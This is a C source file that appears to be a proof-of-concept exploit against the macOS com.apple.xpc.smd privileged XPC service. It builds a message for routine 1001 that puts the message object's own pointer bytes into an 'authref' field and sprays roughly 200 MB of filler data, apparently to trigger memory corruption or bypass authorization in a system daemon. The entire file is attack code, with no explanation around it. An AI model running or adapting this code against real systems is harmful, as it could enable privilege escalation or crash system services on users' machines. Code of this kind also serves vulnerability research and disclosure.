#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>

int main(int argc, char** argv) {
  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.xpc.smd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
  if (conn == NULL) {
    printf("failed to create xpc connection to target service\n");
    exit(EXIT_FAILURE);
  }

  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);

  printf("resumed connection to target service\n");

  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);

  xpc_dictionary_set_int64(msg, "routine", 1001);

  for (int i = 0; i < 100; i++) {
    uint8_t buf[0x20];
    memset(buf, 'A', 0x20);
    char key[0x20] = {0};
    sprintf(key, "key_%d", i);
    xpc_dictionary_set_data(msg, key, buf, 0x20);
  }

  uint8_t buf[0x20];
  memset(buf, 'A', 0x20);
  memcpy((uint8_t*)&buf[0], (uint8_t*)msg, 8);
  printf("0x%016llx\n", *(uint64_t*)(&buf[0]));

  xpc_dictionary_set_data(msg, "authref", buf, 0x20);


  for (int i = 0; i < 100; i++) {
    uint8_t buf[0x20];
    memset(buf, 'A', 0x20);
    char key[0x20] = {0};
    sprintf(key, "key_%d", i+0x2000);
    xpc_dictionary_set_data(msg, key, buf, 0x20);
  }
  

  for (int i = 0; i < 256*200; i++) { // 200 MB
    uint8_t buf[0x1000];
    memset(buf, 'B', 0x1000);
    char key[0x20] = {0};
    sprintf(key, "key_%d", i+0x10000);
    xpc_dictionary_set_data(msg, key, buf, 0x1000);
  }

  xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);

  printf("sent and received\n");

  xpc_release(msg);

  return 0;
}
